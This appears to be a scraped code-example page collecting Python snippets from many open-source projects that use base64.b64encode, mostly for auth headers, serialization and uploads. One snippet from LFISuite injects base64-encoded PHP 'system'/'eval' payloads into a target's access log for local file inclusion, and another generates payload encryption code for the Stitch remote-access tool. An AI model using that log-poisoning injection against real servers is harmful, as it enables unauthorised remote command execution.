python类b64encode()的实例源码

bslurp.py 文件源码 项目:openstack-deploy 作者: yaoice 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def copy_from_host(module):
    compress = module.params.get('compress')
    src = module.params.get('src')

    if not os.path.exists(src):
        module.fail_json(msg="file not found: {}".format(src))
    if not os.access(src, os.R_OK):
        module.fail_json(msg="file is not readable: {}".format(src))

    mode = oct(os.stat(src).st_mode & 0o777)

    with open(src, 'rb') as f:
        raw_data = f.read()

    sha1 = hashlib.sha1(raw_data).hexdigest()
    data = zlib.compress(raw_data) if compress else raw_data

    module.exit_json(content=base64.b64encode(data), sha1=sha1, mode=mode,
                     source=src)
store.py 文件源码 项目:kafka_store 作者: smyte 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def save(self, buffer):
        path = urljoin(self.prefix, buffer.path)

        file_obj = buffer.get_rewound_file()
        md5_base64 = base64.b64encode(buffer.md5).decode('ascii')
        self.objects.insert(
            media_body=http.MediaIoBaseUpload(
                file_obj, 'application/octet-stream'
            ),
            name=path,
            body={
                'md5Hash': md5_base64,
                'metadata': {
                    'count': str(buffer.count),
                },
            },
            bucket=self.bucket,
        ).execute()
payload_code.py 文件源码 项目:Stitch 作者: nathanlopez 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def get_encryption():
    return '''
import base64
from Crypto import Random
from Crypto.Cipher import AES

abbrev = '{2}'
{0} = base64.b64decode('{1}')

def encrypt(raw):
    iv = Random.new().read( AES.block_size )
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return (base64.b64encode( iv + cipher.encrypt( raw ) ) )

def decrypt(enc):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return cipher.decrypt( enc[16:] )
'''.format(st_obf[0],aes_encoded,aes_abbrev)

################################################################################
#                       st_protocol.py stitch_gen variables                    #
################################################################################
NNTPCryptography.py 文件源码 项目:newsreap 作者: caronc 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def encode_public_key(self):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        """
        fileobj = StringIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.public_pem())
            except TypeError:
                # It wasn't initialized yet
                return None

        return b64encode(fileobj.getvalue())
app2.py 文件源码 项目:IotCenter 作者: panjanek 项目源码 文件源码 阅读 42 收藏 0 点赞 0 评论 0
def handleServerCall(self, payload):
        self.logger.info("Handling server callback with payload {0}".format(payload))
        payloadDict = json.loads(payload)
        if "command" in payloadDict:
            command = payloadDict["command"]
            self.logger.info("Received command: {0}".format(command))
            if command == "blink":
                self.logger.info("BLINK!!!")
            elif command == "reboot":
                self.logger.info("REBOOT!!!")
            elif command == "photo":
                self.logger.info("PHOTO!!!")
                photoFile = "/home/pi/puszcz.jpg"
                with open(photoFile, mode='rb') as file:
                    photoData = file.read()
                    base64data = base64.b64encode(photoData)
                    self.service.sendMessage(json.dumps({'image':base64data, 'type':'jpg'}))               
            else:
                self.logger.info("Command '{0}' unknown".format(command))
stone_serializers.py 文件源码 项目:DropboxConnect 作者: raguay 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def encode_primitive(self, validator, value):
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            return None
        elif isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        elif isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            else:
                return base64.b64encode(value).decode('ascii')
        elif isinstance(validator, bv.Integer) \
                and isinstance(value, bool):
            # bool is sub-class of int so it passes Integer validation,
            # but we want the bool to be encoded as ``0`` or ``1``, rather
            # than ``False`` or ``True``, respectively
            return int(value)
        else:
            return value
configurator.py 文件源码 项目:Home-Assistant 作者: jmart518 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def main(args):
    global HTTPD, CREDENTIALS
    if args:
        load_settings(args[0])
    print("Starting server")
    server_address = (LISTENIP, LISTENPORT)
    if CREDENTIALS:
        CREDENTIALS = base64.b64encode(bytes(CREDENTIALS, "utf-8"))
        Handler = AuthHandler
    else:
        Handler = RequestHandler
    if not SSL_CERTIFICATE:
        HTTPD = HTTPServer(server_address, Handler)
    else:
        HTTPD = socketserver.TCPServer(server_address, Handler)
        HTTPD.socket = ssl.wrap_socket(HTTPD.socket,
                                       certfile=SSL_CERTIFICATE,
                                       keyfile=SSL_KEY,
                                       server_side=True)
    print('Listening on: %s://%s:%i' % ('https' if SSL_CERTIFICATE else 'http',
                                        LISTENIP,
                                        LISTENPORT))
    if BASEPATH:
        os.chdir(BASEPATH)
    HTTPD.serve_forever()
utils.py 文件源码 项目:NS_Proj 作者: drstarry 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def vPrint(actor, sent, otherActor, toPrint, base64encode=True):
    """does verbose printing of stuff, with cutoffs for length and base 64
    encoding
    """
    if VERBOSE:
        label = "%s -> %s" % (actor, otherActor)
        if not sent:
            label = "%s <- %s" % (actor, otherActor)
        if len(label) < 12:
            label = label + (" " * (12 - len(label)))
        if type(toPrint) == str:
            if base64encode:
                toPrint = b64encode(toPrint)
            if len(toPrint) > 100:
                toPrint = toPrint[:100] + "..."
        elif type(toPrint) == list:
            if base64encode:
                toPrint = [b64encode(x) if len(x) < 100
                           else b64encode(x[:100]) + '...' for x in toPrint]
            else:
                toPrint = [x if len(x) < 100
                           else x[:100] + '...' for x in toPrint]
        print "%s: <%s>" % (label, toPrint)
connection.py 文件源码 项目:python-libjuju 作者: juju 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def _http_headers(self):
        """Return dictionary of http headers necessary for making an http
        connection to the endpoint of this Connection.

        :return: Dictionary of headers

        """
        if not self.usertag:
            return {}

        creds = u'{}:{}'.format(
            self.usertag,
            self.password or ''
        )
        token = base64.b64encode(creds.encode())
        return {
            'Authorization': 'Basic {}'.format(token.decode())
        }
feed.py 文件源码 项目:cbapi-python 作者: carbonblack 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def __init__(self, **kwargs):
        # these fields are required in every feed descriptor
        self.required = ["name", "display_name",
                         "summary", "tech_data", "provider_url"]
        self.optional = ["category", "icon", "version", "icon_small"]
        self.noemptystrings = ["name", "display_name", "summary", "tech_data", "category"]
        self.data = kwargs

        # if they are present, set the icon fields of the data to hold
        # the base64 encoded file data from their path
        for icon_field in ["icon", "icon_small"]:
            if icon_field in self.data and os.path.exists(self.data[icon_field]):
                icon_path = self.data.pop(icon_field)
                try:
                    self.data[icon_field] = base64.b64encode(open(icon_path, "rb").read())
                except Exception, err:
                    raise CbIconError("Unknown error reading/encoding icon data: %s" % err)
lfisuite.py 文件源码 项目:LFISuite 作者: D35m0nd142 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def send_access_log_cmd(cmd,host,keyword):
    path = ""

    if("_PHP" in keyword):
        keyword = keyword[:-4]
        if(" " in cmd):
            b64cmd = base64.b64encode(cmd)
            path = "/<?php eval(base64_decode('%s'));?>" %(b64cmd)
        else:
            path = "/<?php %s?>" %(cmd)
    else:
        b64cmd = base64.b64encode(cmd)
        path = "/<?php system(base64_decode('%s'));?>" %(b64cmd)

    s = NoURLEncodingSession()
    url = "%s/%s" %(host,path)

    if("GET" in keyword):
        s.get(url, headers=gen_headers)
    else:
        s.head(url, headers=gen_headers)
tasks.py 文件源码 项目:sensu_drive 作者: ilavender 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def sensu_event_resolve(message):

    API_URL = settings.SENSU_API_URL + '/resolve'
    userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii")
    headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest',
               'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Authorization' : 'Basic %s' %  userAndPass }

    try:
        client_name, check_name = message['entity'].split(':')
        post_params = {"client": client_name, "check": check_name}
        request = http.request('POST', API_URL, body=json.dumps(post_params), headers=headers)   
        response = request.status

        if response == 202:
            #reader = codecs.getreader('utf-8')
            #data = json.load(reader(request))
            request.release_conn()
        else:
            logger.error('response: %s' % str(response))

    except:
        logger.error("sensu_event_resolve failed resolving entity: %s" % message['entity'])
        raise
tasks.py 文件源码 项目:sensu_drive 作者: ilavender 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def sensu_client_delete(message):

    API_URL = settings.SENSU_API_URL + '/clients/' + message['client']
    userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii")
    headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest',
               'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Authorization' : 'Basic %s' %  userAndPass }

    try:
        request = http.request('DELETE', API_URL, headers=headers)   
        response = request.status

        if response == 202:
            request.release_conn()
            return True
        else:
            logger.error("sensu_client_delete api request failed: %s" % str(response))
            return False
    except:
        logger.error("sensu_client_delete failed deleting client: %s" % message['client'])
        raise
tasks.py 文件源码 项目:sensu_drive 作者: ilavender 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def sensu_result_delete(message):

    API_URL = settings.SENSU_API_URL + '/results/' + message['client'] + '/' + message['check']
    userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii")
    headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest',
               'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Authorization' : 'Basic %s' %  userAndPass }

    try:
        request = http.request('DELETE', API_URL, headers=headers)   
        response = request.status

        if response == 204:
            request.release_conn()
            return True
        else:
            logger.error("sensu_result_delete api request failed: %s" % str(response))
            return False
    except:
        logger.error("sensu_result_delete failed deleting client: %s check: %s" % (message['client'], message['check']))
        raise
ororo.py 文件源码 项目:plugin.video.exodus 作者: lastship 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['ororo.tv']
        self.base_link = 'https://ororo.tv'
        self.moviesearch_link = '/api/v2/movies'
        self.tvsearch_link = '/api/v2/shows'
        self.movie_link = '/api/v2/movies/%s'
        self.show_link = '/api/v2/shows/%s'
        self.episode_link = '/api/v2/episodes/%s'

        self.user = control.setting('ororo.user')
        self.password = control.setting('ororo.pass')
        self.headers = {
        'Authorization': 'Basic %s' % base64.b64encode('%s:%s' % (self.user, self.password)),
        'User-Agent': 'Exodus for Kodi'
        }
service_account.py 文件源码 项目:oscars2016 作者: 0x0ece 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _to_json(self, strip, to_serialize=None):
        """Utility function that creates JSON repr. of a credentials object.

        Over-ride is needed since PKCS#12 keys will not in general be JSON
        serializable.

        Args:
            strip: array, An array of names of members to exclude from the
                   JSON.
            to_serialize: dict, (Optional) The properties for this object
                          that will be serialized. This allows callers to modify
                          before serializing.

        Returns:
            string, a JSON representation of this instance, suitable to pass to
            from_json().
        """
        if to_serialize is None:
            to_serialize = copy.copy(self.__dict__)
        pkcs12_val = to_serialize.get(_PKCS12_KEY)
        if pkcs12_val is not None:
            to_serialize[_PKCS12_KEY] = base64.b64encode(pkcs12_val)
        return super(ServiceAccountCredentials, self)._to_json(
            strip, to_serialize=to_serialize)
console.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def get_console_log(session, arg_dict):
    try:
        raw_dom_id = arg_dict['dom_id']
    except KeyError:
        raise dom0_pluginlib.PluginError("Missing dom_id")
    try:
        dom_id = int(raw_dom_id)
    except ValueError:
        raise dom0_pluginlib.PluginError("Invalid dom_id")

    logfile = open(CONSOLE_LOG_FILE_PATTERN % dom_id, 'rb')
    try:
        try:
            log_content = _last_bytes(logfile)
        except IOError, e:  # noqa
            msg = "Error reading console: %s" % e
            logging.debug(msg)
            raise dom0_pluginlib.PluginError(msg)
    finally:
        logfile.close()

    return base64.b64encode(zlib.compress(log_content))
test_agent.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def test_inject_file_with_old_agent(self):
        tmp_arg_dict = FAKE_ARG_DICT
        request_id = tmp_arg_dict["id"]
        b64_path = tmp_arg_dict["b64_path"]
        b64_file = tmp_arg_dict["b64_contents"]
        raw_path = base64.b64decode(b64_path)
        raw_file = base64.b64decode(b64_file)
        new_b64 = base64.b64encode("%s,%s" % (raw_path, raw_file))
        self.mock_patch_object(self.agent,
                               '_get_agent_features',
                               'injectfile')
        tmp_arg_dict["value"] = json.dumps({"name": "injectfile",
                                            "value": new_b64})
        tmp_arg_dict["path"] = "data/host/%s" % request_id
        self.agent.inject_file(self.agent, FAKE_ARG_DICT)

        self.agent._wait_for_agent.assert_called_once()
        self.agent.xenstore.write_record.assert_called_with(self.agent,
                                                            tmp_arg_dict)
        self.agent._get_agent_features.assert_called_once()
stone_serializers.py 文件源码 项目:Projects 作者: it2school 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def encode_primitive(self, validator, value):
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            return None
        elif isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        elif isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            else:
                return base64.b64encode(value).decode('ascii')
        elif isinstance(validator, bv.Integer) \
                and isinstance(value, bool):
            # bool is sub-class of int so it passes Integer validation,
            # but we want the bool to be encoded as ``0`` or ``1``, rather
            # than ``False`` or ``True``, respectively
            return int(value)
        else:
            return value
auth_chain.py 文件源码 项目:shadowsocksR-b 作者: hao35954514 项目源码 文件源码 阅读 49 收藏 0 点赞 0 评论 0
def client_udp_pre_encrypt(self, buf):
        if self.user_key is None:
            if b':' in to_bytes(self.server_info.protocol_param):
                try:
                    items = to_bytes(self.server_info.protocol_param).split(':')
                    self.user_key = self.hashfunc(items[1]).digest()
                    self.user_id = struct.pack('<I', int(items[0]))
                except:
                    pass
            if self.user_key is None:
                self.user_id = os.urandom(4)
                self.user_key = self.server_info.key
        authdata = os.urandom(3)
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        uid = struct.unpack('<I', self.user_id)[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata + uid
        return buf + hmac.new(self.user_key, buf, self.hashfunc).digest()[:1]
auth_chain.py 文件源码 项目:shadowsocksR-b 作者: hao35954514 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def server_udp_pre_encrypt(self, buf, uid):
        if uid in self.server_info.users:
            user_key = self.server_info.users[uid]
        else:
            uid = None
            if not self.server_info.users:
                user_key = self.server_info.key
            else:
                user_key = self.server_info.recv_iv
        authdata = os.urandom(7)
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        rand_len = self.udp_rnd_data_len(md5data, self.random_server)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata
        return buf + hmac.new(user_key, buf, self.hashfunc).digest()[:1]
auth_chain.py 文件源码 项目:shadowsocksR-b 作者: hao35954514 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def server_udp_post_decrypt(self, buf):
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, buf[-8:-5], self.hashfunc).digest()
        uid = struct.unpack('<I', buf[-5:-1])[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        if uid in self.server_info.users:
            user_key = self.server_info.users[uid]
        else:
            uid = None
            if not self.server_info.users:
                user_key = self.server_info.key
            else:
                user_key = self.server_info.recv_iv
        if hmac.new(user_key, buf[:-1], self.hashfunc).digest()[:1] != buf[-1:]:
            return (b'', None)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.decrypt(buf[:-8 - rand_len])
        return (out_buf, uid)
protocol.py 文件源码 项目:privcount 作者: privcount 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def handshake_hmac_get(handshake_key, prefix, server_cookie,
                           client_cookie):
        '''
        Return HMAC(handshake_key, prefix | server_cookie | client_cookie),
        base-64 encoded.
        '''
        hmac = b64encode(get_hmac(handshake_key,
                                  prefix,
                                  server_cookie +
                                  client_cookie))
        assert PrivCountProtocol.handshake_hmac_verify(hmac,
                                                       handshake_key,
                                                       prefix,
                                                       server_cookie,
                                                       client_cookie)
        return hmac
keystone_utils.py 文件源码 项目:charm-keystone 作者: openstack 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    :returns: Dictionary with https_keystone and ca_cert set
    """
    ca_data = {}
    https_service_endpoints = config('https-service-endpoints')
    if (https_service_endpoints and
            bool_from_string(https_service_endpoints)):
        # Pass CA cert as client will need it to
        # verify https connections
        ca = get_ca(user=SSH_USER)
        ca_bundle = ca.get_ca_bundle()
        ca_data['https_keystone'] = 'True'
        ca_data['ca_cert'] = b64encode(ca_bundle)
    return ca_data
keystone_utils.py 文件源码 项目:charm-keystone 作者: openstack 项目源码 文件源码 阅读 43 收藏 0 点赞 0 评论 0
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    :returns: Dictionary with https_keystone and ca_cert set
    """
    ca_data = {}
    https_service_endpoints = config('https-service-endpoints')
    if (https_service_endpoints and
            bool_from_string(https_service_endpoints)):
        # Pass CA cert as client will need it to
        # verify https connections
        ca = get_ca(user=SSH_USER)
        ca_bundle = ca.get_ca_bundle()
        ca_data['https_keystone'] = 'True'
        ca_data['ca_cert'] = b64encode(ca_bundle)
    return ca_data
util.py 文件源码 项目:FRG-Crowdsourcing 作者: 97amarnathk 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def get_disqus_sso_payload(user):
    """Return remote_auth_s3 and api_key for user."""
    DISQUS_PUBLIC_KEY = current_app.config.get('DISQUS_PUBLIC_KEY')
    DISQUS_SECRET_KEY = current_app.config.get('DISQUS_SECRET_KEY')
    if DISQUS_PUBLIC_KEY and DISQUS_SECRET_KEY:
        if user:
            data = simplejson.dumps({
                'id': user.id,
                'username': user.name,
                'email': user.email_addr,
            })
        else:
            data = simplejson.dumps({})
        # encode the data to base64
        message = base64.b64encode(data)
        # generate a timestamp for signing the message
        timestamp = int(time.time())
        # generate our hmac signature
        sig = hmac.HMAC(DISQUS_SECRET_KEY, '%s %s' % (message, timestamp),
                        hashlib.sha1).hexdigest()

        return message, timestamp, sig, DISQUS_PUBLIC_KEY
    else:
        return None, None, None, None
upload_t2_results.py 文件源码 项目:TanksAndTemples 作者: IntelVCL 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def generate_md5_file(md5_check_fn, scene_list):
    md5_check = open(md5_check_fn, 'wb')
    for scene in scene_list:
        ply_file = scene + '.ply'
        log_file = scene + '.log'
        if os.path.isfile(ply_file):
            md5_ply_file = generate_file_md5(ply_file, blocksize=2**20)
        else:
            md5_ply_file = ''
        if os.path.isfile(log_file):
            md5_log_file = generate_file_md5(log_file, blocksize=2**20)
        else:
            md5_log_file = ''
        content_md5_log = base64.b64encode(md5_log_file)
        content_md5_ply = base64.b64encode(md5_ply_file)
        print('md5_ply_file: ', ply_file, content_md5_ply)
        print('md5_log_file: ',log_file, content_md5_log)
        md5_check.write("%s###%s\n" % (ply_file, content_md5_ply.decode('UTF-8')))
        md5_check.write("%s###%s\n" % (log_file, content_md5_log.decode('UTF-8')))
    md5_check.close()
sessions.py 文件源码 项目:swjtu-pyscraper 作者: Desgard 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def _tag(value):
    if isinstance(value, tuple):
        return {' t': [_tag(x) for x in value]}
    elif isinstance(value, uuid.UUID):
        return {' u': value.hex}
    elif isinstance(value, bytes):
        return {' b': b64encode(value).decode('ascii')}
    elif callable(getattr(value, '__html__', None)):
        return {' m': text_type(value.__html__())}
    elif isinstance(value, list):
        return [_tag(x) for x in value]
    elif isinstance(value, datetime):
        return {' d': http_date(value)}
    elif isinstance(value, dict):
        return dict((k, _tag(v)) for k, v in iteritems(value))
    elif isinstance(value, str):
        try:
            return text_type(value)
        except UnicodeError:
            from flask.debughelpers import UnexpectedUnicodeError
            raise UnexpectedUnicodeError(u'A byte string with '
                u'non-ASCII data was passed to the session system '
                u'which can only store unicode strings.  Consider '
                u'base64 encoding your string (String was %r)' % value)
    return value
terminal.py 文件源码 项目:TerminalView 作者: Wramberg 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def html(self):
        """
        Returns :attr:`self.file_obj` as an <img> tag with the src set to a
        data::URI.
        """
        if not self.file_obj:
            return u""
        self.file_obj.seek(0)
        # Need to encode base64 to create a data URI
        encoded = base64.b64encode(self.file_obj.read())
        data_uri = "data:{mimetype};base64,{encoded}".format(
            mimetype=self.mimetype, encoded=encoded.decode('utf-8'))
        link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1])
        if self.original_file:
            link = "%s/%s" % (
                self.linkpath, os.path.split(self.original_file.name)[1])
        if self.thumbnail:
            return self.html_icon_template.format(
                link=link,
                src=data_uri,
                icon=self.thumbnail,
                mimetype=self.mimetype)
        return self.html_template.format(
            link=link, src=data_uri, mimetype=self.mimetype)
news.py 文件源码 项目:PTE 作者: pwn2winctf 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def add(self, msg_text, to=None):
        current_time = int(time.time())
        if to is None:
            message = {"msg": msg_text, "time": current_time}
        else:
            team_pk = Team(name=to)['crypt_pk']
            encrypted_msg = pysodium.crypto_box_seal(msg_text.encode("utf-8"),
                                                     team_pk)
            encoded_msg = b64encode(encrypted_msg)

            message = {"msg": encoded_msg.decode("utf-8"),
                       "to": to,
                       "time": current_time}

        self.append(message)
        self.save()

        dest = message["to"] if "to" in message else "all"
        SubRepo.push(commit_message='Added news to %s' % dest,
                     merge_request=False)


问题


面经


文章

微信
公众号

扫码关注公众号